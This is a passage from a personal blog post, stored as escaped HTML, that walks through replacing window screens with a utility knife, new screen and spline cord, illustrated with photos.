Don&#8217;t get a fancy one; get a cheap one. \u00c2\u00a0($2)<\/p>\n<p><strong>Things you already have at home:<\/strong><\/p>\n<p>A utility knife &#8211; scissors work, but a utility knife works better<\/p>\n<p>Some old carboard<\/p>\n<p>____________<\/p>\n<p>First, pop out the frames with the old nasty screens. \u00c2\u00a0With some wiggling, they should come right out.<\/p>\n<p><a href=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_023.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" title=\"Pull off the old cord.\" src=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_023-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a>Second, rip out the old black cord and throw it away.<\/p>\n<p>&nbsp;<\/p>\n<p>Pull off the old screen and throw it away too, unless you are determined to use it for something crafty.<\/p>\n<p><a href=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_021.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3144\" title=\"Pull off the old screen.\" src=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_021-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_021-300x225.jpg 300w, http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_021-1024x768.jpg 1024w, http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_021.jpg 1600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Third, lay the frame on the cardboard (so you don&#8217;t scratch up your table). \u00c2\u00a0Lay new screen over the frame, and cut it with the utility knife so it&#8217;s got a nice wide margin around all sides.<\/p>\n<p><a href=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_022.jpg\"><img loading=\"lazy\" decoding=\"async\" title=\"Easy to cut!\" src=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_022-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" \/><\/a><\/p>\n<p>Fourth: \u00c2\u00a0Stick some licorice-cord into the groove in the frame, holding down the new screen, and press it in with the roller. \u00c2\u00a0Go all the way around the frame.<\/p>\n<p><a href=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_024.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3147\" title=\"Roll the cord into the groove.\" src=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_024-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_024-300x225.jpg 300w, http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_024.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Fifth: \u00c2\u00a0Trim off the extra cord and extra bits of screen with the utility knife.<\/p>\n<p>Finally: \u00c2\u00a0Wiggle the frame back into the window. \u00c2\u00a0That&#8217;s actually the hardest part.<\/p>\n<p><a href=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_027.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3150\" title=\"Hooray!\" src=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_027-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_027-300x225.jpg 300w, http:\/\/www.rebeccagibson.org\/wp-content\/uploads\/2012\/06\/120610_027.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Ta Da! \u00c2\u00a0If anybody needs their screens replaced, call me up. \u00c2\u00a0I&#8217;ll come over and do it for you.<\/p>\n<p>On the other hand, I had to hire a guy to come and replace some stacked-up pieces of railroad lumber with stacked-up cement blocks.
